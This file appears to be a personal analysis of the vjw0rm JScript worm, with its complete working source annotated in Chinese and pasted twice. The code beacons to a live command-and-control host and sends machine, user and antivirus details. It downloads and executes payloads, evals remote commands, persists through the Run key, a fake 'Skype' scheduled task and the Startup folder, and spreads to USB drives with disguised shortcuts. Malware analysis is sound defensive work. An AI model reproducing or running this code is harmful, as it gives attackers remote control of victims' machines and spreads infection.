poynt2005/關於一些rundll32.js的個人思路.js

## 關於一些rundll32.js的個人思路.js
var j = ["WScript.Shell", "Scripting.FileSystemObject", "Shell.Application", "Microsoft.XMLHTTP"];
var g = ["HKCU", "HKLM", "HKCU\\vjw0rm", "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "HKLM\\SOFTWARE\\Classes\\", "REG_SZ", "\\defaulticon\\"];
var y = ["winmgmts:", "win32_logicaldisk", "Win32_OperatingSystem", 'AntiVirusProduct'];

var sh = Cr(0);
var fs = Cr(1);
var spl = "|V|";
var Ch = "\\";
var VN = "21" + "_" + Ob(6); //Ob(6)回傳磁碟區序號，假設 磁碟區序號為1111-1111，則VN = 21_1111-1111
var fu = WScript.ScriptFullName;
var wn = WScript.ScriptName;
var U;
try {
	//讀取Hkey current user機碼
	U = sh.RegRead(g[2]);

	//假如沒有vjw0rm
} catch (err) {

	//取得此script絕對位置
	var sv = fu.split("\\");

	//假設在這個腳本在根目錄
	if (":\\" + sv[1] == ":\\" + wn) {
		U = "TRUE";
		//註冊表新增HKCU\vjw0rm 名稱為REG_SZ的數值寫入TRUE
		sh.RegWrite(g[2], U, g[5]);
	} else {
		U = "FALSE";
		//註冊表新增HKCU\vjw0rm 名稱為REG_SZ的數值寫入FALSE
		sh.RegWrite(g[2], U, g[5]);
	}
}
//假設現在U設為TRUE
Ns();
do {
	//進入無窮迴圈
	try {
		var P = Pt('Vre', '');

		//接到server回復，分析資料
		P = P.split(spl);

		if (P[0] === "Cl") {
			WScript.Quit(1);
		}

		//從server接到的二進位資料P[1]，寫入名為P[2]檔案，保存在系統暫存資料夾中
		//執行這個檔案
		//***猜測P[1]可能為主要的加密工具***
		if (P[0] === "Sc") {
			var s2 = Ex("temp") + "\\" + P[2];
			var fi = fs.CreateTextFile(s2, true);
			fi.Write(P[1]);
			fi.Close();
			sh.run(s2);
		}

		//直接執行P[1]
		if (P[0] === "Ex") {
			eval(P[1]);
		}

		/*
			1. 唯讀開啟本腳本檔案，讀取之，並存進fr變數
			2. VN變成["21", "1111-1111"]
			3. 置換字串"21"為P[1]
			4. 把fr寫入本檔，並執行本檔
			5. 猜測此步驟可以把本腳本變成加密工具
			6. 底下的if block差不多也是做同樣的事，就是想辦法執行P[1]的病毒碼
		*/
		if (P[0] === "Rn") {
			var ri = fs.OpenTextFile(fu, 1);
			var fr = ri.ReadAll();
			ri.Close();
			VN = VN.split("_");
			fr = fr.replace(VN[0], P[1]);
			var wi = fs.OpenTextFile(fu, 2, false);
			wi.Write(fr);
			wi.Close();
			sh.run("wscript.exe //B \"" + fu + "\"");
			WScript.Quit(1);
		}

		if (P[0] === "Up") {
			var s2 = Ex("temp") + "\\" + P[2];
			var ctf = fs.CreateTextFile(s2, true);
			var gu = P[1];
			gu = gu.replace("|U|", "|V|");
			ctf.Write(gu);
			ctf.Close();
			sh.run("wscript.exe //B \"" + s2 + "\"", 6);
			WScript.Quit(1);
		}

		if (P[0] === "Un") {
			var s2 = P[1];
			var vdr = Ex("Temp") + Ch + wn;
			var regi = "OBAJQA1X0B";
			s2 = s2.replace("%f", fu).replace("%n", wn).replace("%sfdr", vdr).replace("%RgNe%", regi);
			eval(s2);
			WScript.Quit(1);
		}

		if (P[0] === "RF") {
			var s2 = Ex("temp") + "\\" + P[2];
			var fi = fs.CreateTextFile(s2, true);
			fi.Write(P[1]);
			fi.Close();
			sh.run(s2);
		}
	} catch (err) {}
	WScript.Sleep(7000);
	Spr();
} while (true);

function Ex(S) {
	//取得系統bang數
	return sh.ExpandEnvironmentStrings("%" + S + "%");
}

function Pt(C, A) {
	//C = "Vre" , A=""
	//呼叫xhr
	var X = Cr(3);
	//初始化http請求，等一下對http://mscompany.dynu.com:7974/Vre送出Post Request
	X.open('POST', 'http://mscompany.dynu.com:7974/' + C, false);
	//Header的userAgnet欄設為21_1111-1111\desktop-123456moethfucker)\Microsoft Windows 7 Enterprise\ESET NOD32 Antivirus 4\\YES\TRUE
	X.SetRequestHeader("User-Agent:", nf());
	//送出request
	X.send(A);
	//回傳response文字
	return X.responsetext;
}

function nf() {
	var s,
	NT//(假設NT為YES),
	i;
	//假如%Windir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe 存在
	//%Windir%通常是C:\Windows
	if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {
		//NT設定為YES
		NT = "YES";
	} else {
		//不然為NO
		NT = "NO";
	}
	s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;
	//回傳 21_1111-1111\%COMPUTERNAME%(假設為:desktop-123456)\%USERNAME%(假設為:moethfucker)\Microsoft Windows 7 Enterprise\ESET NOD32 Antivirus 4\\YES\TRUE

	return s;
}

function Cr(N) {
	return new ActiveXObject(j[N]);
}

function Ob(N) {
	var s;

	//回傳作業系統版本名字
	if (N == 2) {
		//Win32_OperatingSystem代表一個安裝在電腦上的windows based作業系統
		s = GetObject(y[0]).InstancesOf(y[2]);
		var en = new Enumerator(s);
		for (; !en.atEnd(); en.moveNext()) {
			var it = en.item();
			//Caption為一個字串，代表作業系統版本，例如"Microsoft Windows 7 Enterprise"
			return it.Caption;
			break;
		}
	}
	//反正就是拿到防毒軟體名字(例如: ESET NOD32 Antivirus 4)
	//估計這步驟是要讓server回傳可以躲過特定防毒軟體的病毒。。。
	if (N == 4) {
		/*
			有兩種版本的securitycenter，
			securitycenter1: Vista之前的Windows
			securitycenter2: Vista之後的Windows
			兩者的資料結構不太一樣
		*/
		var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";
		s = GetObject(wmg).InstancesOf(y[3]);
		var en = new Enumerator(s);
		for (; !en.atEnd(); en.moveNext()) {
			var it = en.item();
			var str = it.DisplayName;
		}

		if (str !== '') {
			wmg = wmg + "2";
			s = GetObject(wmg).InstancesOf(y[3]);
			en = new Enumerator(s);
			for (; !en.atEnd(); en.moveNext()) {
				it = en.item();

				return it.DisplayName;
			}
		} else {
			return it.DisplayName;
		}
	}
	//此block回傳磁碟區序號
	if (N == 6) {
		//GetObject("WinMgmts:")获取系统信息
		//Win32_LogicalDisk代表一個安裝著windows的硬碟
		s = GetObject(y[0]).InstancesOf(y[1]);
		//Enumerator 可以列舉collections裡的物品
		var en = new Enumerator(s);
		for (; !en.atEnd(); en.moveNext()) {
			var it = en.item();

			//volumeserialnumber為一個字串，長度最長為11個字，代表一個邏輯磁區的序號(Ex: "1111-1111")
			return it.volumeserialnumber;
			break;
		}
	}
}

function Ns() {

	//取得系統暫存檔資料夾(Ex: C:\User\AppData\Local\TEMP)
	var dr = Ex("TEMP") + Ch + wn;
	try {
		//將此script複製到暫存資料夾
		fs.CopyFile(fu, dr, true);
	} catch (err) {}
	try {
		//在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OBAJQA1X0B 新增REG_SZ，寫入此檔案位置
		//開機會啟動此檔
		sh.RegWrite(g[0] + g[3] + "OBAJQA1X0B", "\"" + dr + "\"", g[5]);
	} catch (err) {}
	try {
		//建立名為Skype排程器，每30分鐘執行一次
		sh.run("Schtasks /create /sc minute /mo 30 /tn Skype /tr \"" + dr, false);
	} catch (err) {}

	try {
		var ap = Cr(2);
		//把此script複製到使用者存放啟動項目的資料夾
		//NameSpace(ssfSTARTUP = 7) => 使用者存放啟動項目的資料夾
		fs.CopyFile(fu, ap.NameSpace(7).Self.Path + "\\" + wn, true);
	} catch (err) {}
}

function Spr() {
	try {
		//GetObject會傳回 ActiveX 元件所提供之物件的參照
		var ld = GetObject(y[0]).InstancesOf(y[1]);
		var edi = new Enumerator(ld);
		for (; !edi.atEnd(); edi.moveNext()) {
			var dri = edi.item();

			//DeviceID : Unique identifier of the logical disk from other devices on the system.
			//GetDrive是一個可以指向某個特定的磁碟機的物件
			var dri = fs.GetDrive(dri.DeviceID);
			var dp = dri.Path + "\\";
			if (dri.IsReady) {
				//假設此裝置為卸除式媒體(行動硬碟、軟碟、U盤)
				if (dri.DriveType === 1) {

					//將本腳本複製到這個卸除式媒體裡面
					fs.CopyFile(fu, dp + wn, true);
					if (fs.FileExists(dp + wn)) {

						//代表此檔案為系統檔案，並且隱藏
						fs.GetFile(dp + wn).attributes = 2 + 4;
					}
					try {
						//取得這個媒體所有的資料夾
						var ef = new Enumerator(fs.GetFolder(dp).SubFolders);
						for (; !ef.atEnd(); ef.moveNext()) {
							//取得其中一個資料夾
							var gf = ef.item();
							gf.attributes = 2 + 4;
							wn = wn.replace(" ", "\"" + " " + "\"");
							var n = gf.name;
							n = n.replace(" ", "\"" + " " + "\"");
							//為這個資料夾建立捷徑
							var sr = sh.CreateShortCut(dp + gf.name + ".lnk");

							//未來執行這個捷徑會自動縮小
							sr.WindowStyle = 7;
							//此捷徑指向cmd.exe
							sr.TargetPath = "cmd.exe";
							//打開此捷徑的話會自動啟動本腳本，而且改變這個捷徑的圖標
							sr.Arguments = "/c start " + wn + "&start explorer " + n + "&exit";
							var rp = "HKLM\\software\\classes\\folder\\defaulticon\\";
							var fic = sh.RegRead(rp);
							var ci = sr.IconLocation;
							var sci = ",";
							if (ci.indexOf(sci) !== -1) {
								sr.IconLocation = fic;
							} else {
								sr.IconLocation = gf.Path;
							}
							sr.Save();
						}

					} catch (err) {}
					try {
						//獲得所有文件
						var efi = new Enumerator(fs.GetFolder(dp).Files);
						for (; !efi.atEnd(); efi.moveNext()) {
							//取得其中一個文件
							var gfi = efi.item();
							var dot = ".";
							var lnk = "lnk";
							if (gfi.name.indexOf(dot) !== -1) {
								if (gfi.name.indexOf(lnk) !== -1) {}
								else {
									//假設這個文件不是本腳本檔
									if (gfi.name !== wn) {
										//這個文件設為隱藏、系統檔
										gfi.attributes = 2 + 4;
										var nu = gfi.name;
										nu = nu.replace(" ", "\"" + " " + "\"");
										wn = wn.replace(" ", "\"" + " " + "\"");

										//然後這邊基本上跟上面一樣，把原本檔案設為隱藏，然後新增捷徑，把該捷徑圖標轉成原本的檔案的圖標
										var shr = sh.CreateShortCut(dp + gfi.name + ".lnk");
										shr.WindowStyle = 7;
										shr.TargetPath = "cmd.exe";
										shr.Arguments = "/c start " + wn + "&start " + nu + "&exit";
										var sgf = gfi.name.split(".");
										var fvi = sh.RegRead(g[4] + "." + sgf[sgf.length - 1] + "\\");
										var fvi2 = sh.RegRead(g[4] + fvi + g[6] + "\\");
										var ci = shr.IconLocation;
										var sci = ",";
										if (ci.indexOf(sci) !== -1) {
											shr.IconLocation = fvi2;
										} else {
											shr.IconLocation = gfi.Path;
										}
										shr.Save();
									}
								}
							}
						}
					} catch (err) {}
				}
			}
		}

	} catch (err) {}
}
	var j = ["WScript.Shell", "Scripting.FileSystemObject", "Shell.Application", "Microsoft.XMLHTTP"];
	var g = ["HKCU", "HKLM", "HKCU\\vjw0rm", "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "HKLM\\SOFTWARE\\Classes\\", "REG_SZ", "\\defaulticon\\"];
	var y = ["winmgmts:", "win32_logicaldisk", "Win32_OperatingSystem", 'AntiVirusProduct'];

	var sh = Cr(0);
	var fs = Cr(1);
	var spl = "\|V\|";
	var Ch = "\\";
	var VN = "21" + "_" + Ob(6); //Ob(6)回傳磁碟區序號，假設磁碟區序號為1111-1111，則VN = 21_1111-1111
	var fu = WScript.ScriptFullName;
	var wn = WScript.ScriptName;
	var U;
	try {
	//讀取Hkey current user機碼
	U = sh.RegRead(g[2]);

	//假如沒有vjw0rm
	} catch (err) {

	//取得此script絕對位置
	var sv = fu.split("\\");

	//假設在這個腳本在根目錄
	if (":\\" + sv[1] == ":\\" + wn) {
	U = "TRUE";
	//註冊表新增HKCU\vjw0rm 名稱為REG_SZ的數值寫入TRUE
	sh.RegWrite(g[2], U, g[5]);
	} else {
	U = "FALSE";
	//註冊表新增HKCU\vjw0rm 名稱為REG_SZ的數值寫入FALSE
	sh.RegWrite(g[2], U, g[5]);
	}
	}
	//假設現在U設為TRUE
	Ns();
	do {
	//進入無窮迴圈
	try {
	var P = Pt('Vre', '');

	//接到server回復，分析資料
	P = P.split(spl);

	if (P[0] === "Cl") {
	WScript.Quit(1);
	}

	//從server接到的二進位資料P[1]，寫入名為P[2]檔案，保存在系統暫存資料夾中
	//執行這個檔案
	//*猜測P[1]可能為主要的加密工具*
	if (P[0] === "Sc") {
	var s2 = Ex("temp") + "\\" + P[2];
	var fi = fs.CreateTextFile(s2, true);
	fi.Write(P[1]);
	fi.Close();
	sh.run(s2);
	}

	//直接執行P[1]
	if (P[0] === "Ex") {
	eval(P[1]);
	}

	/*
	1. 唯讀開啟本腳本檔案，讀取之，並存進fr變數
	2. VN變成["21", "1111-1111"]
	3. 置換字串"21"為P[1]
	4. 把fr寫入本檔，並執行本檔
	5. 猜測此步驟可以把本腳本變成加密工具
	6. 底下的if block差不多也是做同樣的事，就是想辦法執行P[1]的病毒碼
	*/
	if (P[0] === "Rn") {
	var ri = fs.OpenTextFile(fu, 1);
	var fr = ri.ReadAll();
	ri.Close();
	VN = VN.split("_");
	fr = fr.replace(VN[0], P[1]);
	var wi = fs.OpenTextFile(fu, 2, false);
	wi.Write(fr);
	wi.Close();
	sh.run("wscript.exe //B \"" + fu + "\"");
	WScript.Quit(1);
	}

	if (P[0] === "Up") {
	var s2 = Ex("temp") + "\\" + P[2];
	var ctf = fs.CreateTextFile(s2, true);
	var gu = P[1];
	gu = gu.replace("\|U\|", "\|V\|");
	ctf.Write(gu);
	ctf.Close();
	sh.run("wscript.exe //B \"" + s2 + "\"", 6);
	WScript.Quit(1);
	}

	if (P[0] === "Un") {
	var s2 = P[1];
	var vdr = Ex("Temp") + Ch + wn;
	var regi = "OBAJQA1X0B";
	s2 = s2.replace("%f", fu).replace("%n", wn).replace("%sfdr", vdr).replace("%RgNe%", regi);
	eval(s2);
	WScript.Quit(1);
	}

	if (P[0] === "RF") {
	var s2 = Ex("temp") + "\\" + P[2];
	var fi = fs.CreateTextFile(s2, true);
	fi.Write(P[1]);
	fi.Close();
	sh.run(s2);
	}
	} catch (err) {}
	WScript.Sleep(7000);
	Spr();
	} while (true);

	function Ex(S) {
	//取得系統bang數
	return sh.ExpandEnvironmentStrings("%" + S + "%");
	}

	function Pt(C, A) {
	//C = "Vre" , A=""
	//呼叫xhr
	var X = Cr(3);
	//初始化http請求，等一下對http://mscompany.dynu.com:7974/Vre送出Post Request
	X.open('POST', 'http://mscompany.dynu.com:7974/' + C, false);
	//Header的userAgnet欄設為21_1111-1111\desktop-123456moethfucker)\Microsoft Windows 7 Enterprise\ESET NOD32 Antivirus 4\\YES\TRUE
	X.SetRequestHeader("User-Agent:", nf());
	//送出request
	X.send(A);
	//回傳response文字
	return X.responsetext;
	}

	function nf() {
	var s,
	NT//(假設NT為YES),
	i;
	//假如%Windir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe 存在
	//%Windir%通常是C:\Windows
	if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {
	//NT設定為YES
	NT = "YES";
	} else {
	//不然為NO
	NT = "NO";
	}
	s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;
	//回傳 21_1111-1111\%COMPUTERNAME%(假設為:desktop-123456)\%USERNAME%(假設為:moethfucker)\Microsoft Windows 7 Enterprise\ESET NOD32 Antivirus 4\\YES\TRUE

	return s;
	}

	function Cr(N) {
	return new ActiveXObject(j[N]);
	}

	function Ob(N) {
	var s;

	//回傳作業系統版本名字
	if (N == 2) {
	//Win32_OperatingSystem代表一個安裝在電腦上的windows based作業系統
	s = GetObject(y[0]).InstancesOf(y[2]);
	var en = new Enumerator(s);
	for (; !en.atEnd(); en.moveNext()) {
	var it = en.item();
	//Caption為一個字串，代表作業系統版本，例如"Microsoft Windows 7 Enterprise"
	return it.Caption;
	break;
	}
	}
	//反正就是拿到防毒軟體名字(例如: ESET NOD32 Antivirus 4)
	//估計這步驟是要讓server回傳可以躲過特定防毒軟體的病毒。。。
	if (N == 4) {
	/*
	有兩種版本的securitycenter，
	securitycenter1: Vista之前的Windows
	securitycenter2: Vista之後的Windows
	兩者的資料結構不太一樣
	*/
	var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";
	s = GetObject(wmg).InstancesOf(y[3]);
	var en = new Enumerator(s);
	for (; !en.atEnd(); en.moveNext()) {
	var it = en.item();
	var str = it.DisplayName;
	}

	if (str !== '') {
	wmg = wmg + "2";
	s = GetObject(wmg).InstancesOf(y[3]);
	en = new Enumerator(s);
	for (; !en.atEnd(); en.moveNext()) {
	it = en.item();

	return it.DisplayName;
	}
	} else {
	return it.DisplayName;
	}
	}
	//此block回傳磁碟區序號
	if (N == 6) {
	//GetObject("WinMgmts:")获取系统信息
	//Win32_LogicalDisk代表一個安裝著windows的硬碟
	s = GetObject(y[0]).InstancesOf(y[1]);
	//Enumerator 可以列舉collections裡的物品
	var en = new Enumerator(s);
	for (; !en.atEnd(); en.moveNext()) {
	var it = en.item();

	//volumeserialnumber為一個字串，長度最長為11個字，代表一個邏輯磁區的序號(Ex: "1111-1111")
	return it.volumeserialnumber;
	break;
	}
	}
	}

	function Ns() {

	//取得系統暫存檔資料夾(Ex: C:\User\AppData\Local\TEMP)
	var dr = Ex("TEMP") + Ch + wn;
	try {
	//將此script複製到暫存資料夾
	fs.CopyFile(fu, dr, true);
	} catch (err) {}
	try {
	//在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OBAJQA1X0B 新增REG_SZ，寫入此檔案位置
	//開機會啟動此檔
	sh.RegWrite(g[0] + g[3] + "OBAJQA1X0B", "\"" + dr + "\"", g[5]);
	} catch (err) {}
	try {
	//建立名為Skype排程器，每30分鐘執行一次
	sh.run("Schtasks /create /sc minute /mo 30 /tn Skype /tr \"" + dr, false);
	} catch (err) {}

	try {
	var ap = Cr(2);
	//把此script複製到使用者存放啟動項目的資料夾
	//NameSpace(ssfSTARTUP = 7) => 使用者存放啟動項目的資料夾
	fs.CopyFile(fu, ap.NameSpace(7).Self.Path + "\\" + wn, true);
	} catch (err) {}
	}

	function Spr() {
	try {
	//GetObject會傳回 ActiveX 元件所提供之物件的參照
	var ld = GetObject(y[0]).InstancesOf(y[1]);
	var edi = new Enumerator(ld);
	for (; !edi.atEnd(); edi.moveNext()) {
	var dri = edi.item();

	//DeviceID : Unique identifier of the logical disk from other devices on the system.
	//GetDrive是一個可以指向某個特定的磁碟機的物件
	var dri = fs.GetDrive(dri.DeviceID);
	var dp = dri.Path + "\\";
	if (dri.IsReady) {
	//假設此裝置為卸除式媒體(行動硬碟、軟碟、U盤)
	if (dri.DriveType === 1) {

	//將本腳本複製到這個卸除式媒體裡面
	fs.CopyFile(fu, dp + wn, true);
	if (fs.FileExists(dp + wn)) {

	//代表此檔案為系統檔案，並且隱藏
	fs.GetFile(dp + wn).attributes = 2 + 4;
	}
	try {
	//取得這個媒體所有的資料夾
	var ef = new Enumerator(fs.GetFolder(dp).SubFolders);
	for (; !ef.atEnd(); ef.moveNext()) {
	//取得其中一個資料夾
	var gf = ef.item();
	gf.attributes = 2 + 4;
	wn = wn.replace(" ", "\"" + " " + "\"");
	var n = gf.name;
	n = n.replace(" ", "\"" + " " + "\"");
	//為這個資料夾建立捷徑
	var sr = sh.CreateShortCut(dp + gf.name + ".lnk");

	//未來執行這個捷徑會自動縮小
	sr.WindowStyle = 7;
	//此捷徑指向cmd.exe
	sr.TargetPath = "cmd.exe";
	//打開此捷徑的話會自動啟動本腳本，而且改變這個捷徑的圖標
	sr.Arguments = "/c start " + wn + "&start explorer " + n + "&exit";
	var rp = "HKLM\\software\\classes\\folder\\defaulticon\\";
	var fic = sh.RegRead(rp);
	var ci = sr.IconLocation;
	var sci = ",";
	if (ci.indexOf(sci) !== -1) {
	sr.IconLocation = fic;
	} else {
	sr.IconLocation = gf.Path;
	}
	sr.Save();
	}

	} catch (err) {}
	try {
	//獲得所有文件
	var efi = new Enumerator(fs.GetFolder(dp).Files);
	for (; !efi.atEnd(); efi.moveNext()) {
	//取得其中一個文件
	var gfi = efi.item();
	var dot = ".";
	var lnk = "lnk";
	if (gfi.name.indexOf(dot) !== -1) {
	if (gfi.name.indexOf(lnk) !== -1) {}
	else {
	//假設這個文件不是本腳本檔
	if (gfi.name !== wn) {
	//這個文件設為隱藏、系統檔
	gfi.attributes = 2 + 4;
	var nu = gfi.name;
	nu = nu.replace(" ", "\"" + " " + "\"");
	wn = wn.replace(" ", "\"" + " " + "\"");

	//然後這邊基本上跟上面一樣，把原本檔案設為隱藏，然後新增捷徑，把該捷徑圖標轉成原本的檔案的圖標
	var shr = sh.CreateShortCut(dp + gfi.name + ".lnk");
	shr.WindowStyle = 7;
	shr.TargetPath = "cmd.exe";
	shr.Arguments = "/c start " + wn + "&start " + nu + "&exit";
	var sgf = gfi.name.split(".");
	var fvi = sh.RegRead(g[4] + "." + sgf[sgf.length - 1] + "\\");
	var fvi2 = sh.RegRead(g[4] + fvi + g[6] + "\\");
	var ci = shr.IconLocation;
	var sci = ",";
	if (ci.indexOf(sci) !== -1) {
	shr.IconLocation = fvi2;
	} else {
	shr.IconLocation = gfi.Path;
	}
	shr.Save();
	}
	}
	}
	}
	} catch (err) {}
	}
	}
	}

	} catch (err) {}
	}